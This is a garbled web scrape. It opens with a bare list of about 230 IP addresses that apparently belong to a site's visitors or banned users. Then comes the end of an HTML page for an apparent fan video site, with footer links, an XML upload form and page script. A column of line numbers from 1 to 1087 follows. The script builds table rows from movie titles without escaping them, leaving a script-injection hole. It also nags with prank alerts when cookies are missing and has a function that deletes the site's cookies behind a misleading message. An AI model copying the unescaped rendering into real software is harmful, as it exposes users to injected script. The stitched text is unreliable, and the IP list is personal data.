173.92.82.37
75.184.89.14
173.169.182.197
24.17.1.128
107.77.245.20
24.118.85.127
24.236.141.55
89.187.177.73
209.107.196.111
179.198.179.117
84.81.156.64
194.35.119.5
173.3.28.208
71.178.208.126
45.227.56.126
69.206.223.139
45.33.133.39
65.30.37.129
45.74.106.38
69.236.119.248
23.233.55.156
85.2.194.48
107.77.245.16
75.65.200.22
85.255.235.14
114.142.234.106
194.35.119.4
191.96.97.58
71.58.20.149
82.18.235.191
195.74.76.237
182.77.33.56
36.75.120.202
61.6.236.205
61.6.238.106
86.146.135.21
45.33.132.43
118.96.178.198
45.33.130.38
24.135.198.167
90.197.29.128
123.49.15.128
62.128.207.102
27.75.219.79
45.33.135.36
205.185.209.209
205.185.209.215
65.43.87.152
205.185.209.34
77.46.226.115
82.155.102.28
151.54.121.100
178.235.206.72
216.151.180.33
209.107.204.188
24.154.168.21
82.59.17.197
36.68.222.28
86.129.177.114
162.210.29.231
45.33.136.40
186.21.135.160
82.208.115.168
76.216.235.0
109.152.3.180
68.184.102.251
45.33.131.45
76.175.190.158
107.128.64.228
73.132.195.120
79.115.185.91
206.45.174.219
151.227.248.195
107.77.245.9
5.13.217.163
69.206.254.143
45.56.161.44
36.72.215.210
31.167.105.90
187.13.100.166
97.86.115.83
90.180.241.161
194.35.118.34
49.237.21.235
45.33.133.41
194.35.118.21
109.93.233.218
70.61.61.156
38.111.214.62
97.104.143.27
64.145.93.151
194.35.118.61
76.124.49.138
41.40.221.126
51.81.83.123
83.222.181.201
196.235.125.124
99.146.249.221
194.35.118.26
46.161.65.30
98.220.20.134
50.25.202.120
91.171.109.215
188.94.33.38
194.35.118.41
45.33.138.40
92.6.154.206
191.111.133.51
107.77.236.43
73.45.95.27
45.33.138.33
194.35.118.1
207.244.89.162
178.222.208.150
51.198.92.9
45.33.129.37
45.33.129.33
107.77.169.24
209.107.216.249
37.228.211.79
107.77.232.67
174.17.2.246
122.161.124.250
194.35.118.60
68.113.151.206
45.33.129.42
205.169.39.253
148.252.128.184
205.169.39.45
194.35.118.28
90.209.185.10
185.219.168.254
173.21.30.146
209.107.216.241
194.35.118.63
173.79.41.119
74.211.82.83
194.35.118.30
5.149.253.57
72.50.1.235
47.220.155.76
191.19.36.242
45.33.132.40
177.201.177.101
52.203.146.27
35.224.175.28
107.77.236.118
38.111.212.126
107.77.236.232
98.149.68.59
107.77.236.171
194.35.118.49
51.91.31.157
107.77.236.214
97.103.2.58
151.229.166.3
45.33.133.44
90.210.203.6
209.107.196.219
187.13.105.160
18.236.158.252
194.35.118.59
107.77.233.65
194.35.118.9
194.35.118.35
107.77.233.42
45.33.134.36
194.35.118.36
194.35.118.58
194.35.118.57
45.33.139.33
107.77.236.156
72.49.186.34
54.175.76.61
194.35.118.40
14.192.209.218
79.76.254.203
194.35.118.50
2.220.229.197
178.155.5.253
194.35.118.20
205.169.39.190
205.169.39.16
194.35.118.23
194.35.118.4
162.251.232.57
45.33.129.46
86.21.114.247
107.77.236.71
146.241.128.238
73.205.226.116
45.33.137.45
45.33.128.45
45.33.130.43
107.77.189.47
86.120.125.240
45.21.63.37
70.120.94.21
178.221.158.161
172.58.155.151
99.203.16.90
45.33.134.43
38.111.215.254
194.35.118.17
94.4.213.55
178.155.5.144
194.35.118.46
194.106.121.183
45.33.130.32
178.165.130.203
194.35.118.53
45.33.133.34
194.35.118.37
1.53.217.145
194.35.118.3
178.222.134.60
194.35.118.56
66.249.76.111
156.146.59.7
45.33.136.44
</pre></p>
</div>
</center>
<footer>
<nav id="foot-left">
<a href="help.html">Help menu</a>
<a href="https://discord.gg/VjttekJ" target="_target">Discord server</a>
<a href="https://www.youtube.com/channel/UCJ5tu6mx23edw4fzFEy1BWA?sub_confirmation=1" target="_target">YouTube</a>
<a href="https://twitter.com/ScoutItz" target="_target">Twitter</a>
<a href="https://github.com/onutemaster777" target="_target">GitHub</a>
<a href="https://www.reddit.com/user/onute_saulute" target="_target">Reddit</a>
<a href="http://78.63.40.199:2095" target="_target">BonziWORLD: Revived</a>
</nav>
<nav id="foot-right">
<a href="list.html">Index</a>
<a href="https://wrapper.online/caillou.html">down</a>
</nav>
</footer>
<form enctype='multipart/form-data' action='/upload_movie' method='post'>
<input id='file' type="file" accept=".xml" onchange="this.form.submit()" name='import' />
</form>
</body>
<script>
const closeReq = new XMLHttpRequest();
closeReq.open('GET', '/events/close');
closeReq.send();
var json;
var tbody = document.getElementsByTagName('tbody')[0];
var loadMore = document.getElementById('load_more');
const listReq = new XMLHttpRequest();
listReq.open('GET', '/movieList');
listReq.send();
var C = 0;
function loadRows() {
let c = C; C += 69;
for (; c < C; c++) {
if (c > json.length - 1) {
loadMore.remove();
break;
}
const tbl = json[c];
const date = tbl.date.substr(0, 10) + ' ' + tbl.date.substr(11);
tbody.insertAdjacentHTML('beforeend',
'<tr><td><img src="/movie_thumbs/' + tbl.id + '"></td><td><div>' + tbl.title + '</div><div>' + tbl.durationString + '</div></div></td><td><span>' + date.match(/./g).join('</span><span>') + '</span></td><td><a href="javascript:;" onclick="popup(\'' + tbl.id + '\')"></a><a href="/go_full?movieId=' + tbl.id + '"></a><a href="/movies/' + tbl.id + '.xml" download="' + tbl.title + '"></a></td></tr>');
}
}
loadMore.onclick = loadRows;
listReq.onreadystatechange = function (e) {
if (listReq.readyState != 4) return;
json = JSON.parse(listReq.responseText);
loadRows();
}
function popup(id) {
window.open('/player?movieId=' + id, 'MsgWindow', 'width=800,height=600,left=' + (screen.width / 2 - 640) + ',top=' + (screen.height / 2 - 360));
}
setInterval(function(){
if(document.cookie==''){alert('Oh no, you need a magic word from Jurassic Park trolley. Let\'s go, just a simple!');window.location.replace('magicword.html')} else { undefined; }
}, 1000);
function dac(){alert('Even your dangerous cookies are deleted, you wouldn\'t login any websites, so save your accounts instead and create your accounts first');document.cookie.split(";").forEach(function(c) { document.cookie = c.replace(/^ +/, "").replace(/=.*/, "=;expires=" + new Date().toUTCString() + ";path=/"); })}
</script>
</html>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
1053
1054
1055
1056
1057
1058
1059
1060
1061
1062
1063
1064
1065
1066
1067
1068
1069
1070
1071
1072
1073
1074
1075
1076
1077
1078
1079
1080
1081
1082
1083
1084
1085
1086
1087